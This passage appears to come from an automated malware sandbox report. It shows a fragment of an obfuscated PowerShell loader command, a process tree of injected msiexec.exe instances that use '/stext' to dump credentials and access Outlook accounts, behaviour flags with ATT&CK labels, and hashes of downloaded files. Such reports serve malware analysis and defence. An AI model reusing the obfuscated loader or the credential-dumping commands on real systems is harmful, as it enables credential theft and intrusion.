ogesprrskrtPre]Far:Bar:PerFNatrsulo C m V BPlaaE.psTjue Go6 ik4KonsAutt Prrsu i ytnAvag an(Ord$staK raistarPolsFortsa ePyriKvanO.e)Des ');spaliets253 (Tropotaxis ' Re$stagPo.L.idOD sbPykaTelLtra: HiUOriNsceo snrskfDT.mI koNOvoaFinT C,EUu ner= sh K,i[c.nsa fY MisOveTscheBogmHaa.dest Mae VixTreTG b. joEmicNFinc skOL pDMoriAfpNOvegs.u] Fy:str:s vApirsHiscPr I ori xp.FdeG U,eParTRinsKhaT H,rBumIRomnRe GA b( Ov$EksRTykEgraVFriiDecDF.re ,or U,EEpissno)Pye ');spaliets253 (Tropotaxis '.la$ H,gCoql ipOOutb egaAntLHom:RundUndACa C UdisamtZesER.n= ov$OveuBilNPe OR,nr A DFu.i ,oNIndAProtsa e.mb.De sErhuThoB udsafrTQ aRsani FrN K gMin( In$LofpFitEManrId s psEHjevud e DiR.onI GoNAttG U LBigYRen2Cha0agt2Fil,Fi.$ siDGaliViksChas ,eI Hud bse suNLe Tde e rRMe )spr ');spaliets253 $Dacite;"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\syswow64\msiexec.exe"5⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3996
-
-
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybuzcyfreuikiydqvmq"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdajdrqlscaxsmaumwdjpm"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3696
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lxncwjbmglscvsoyvhxkaztdk"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
215KB
MD51e13b1cfc831ed2d5540f088b2d9b5cc
SHA15fe91312509f191c90bc52c4561652522a336573
SHA25607b2a32cf575dfe3b0158d36d7ffd9d9e256339f8d0f8d8a99e3a7f00d25f658
SHA5126a119f54689fb6fbe332a440e3be997eba8189fa9a0b8b2d39e9c5adb11dbdfd7322ed2f83f3157812da0b0a2fb0d3a6d6e6145c2b093f713d8cf009c7ab46e2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560a0bdc1cf495566ff810105d728af4a
SHA1243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA5124445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5
-
Filesize
446KB
MD5147387bd4f193c71205b14f710bfa34d
SHA1d011bd678c745317d8df2bb78f4b6ec564e77586
SHA2563679b9d1adb0b062d79bc30d6c381c830dc09f4b38a92ed1ab990e97b5a24747
SHA512db1c515bce5c8264947285c378609c5bf61a57e9093963616241c417076c065c1db452263ccb2b94b20acfc837605feed10d3930b33b5400975f1182a63b1c71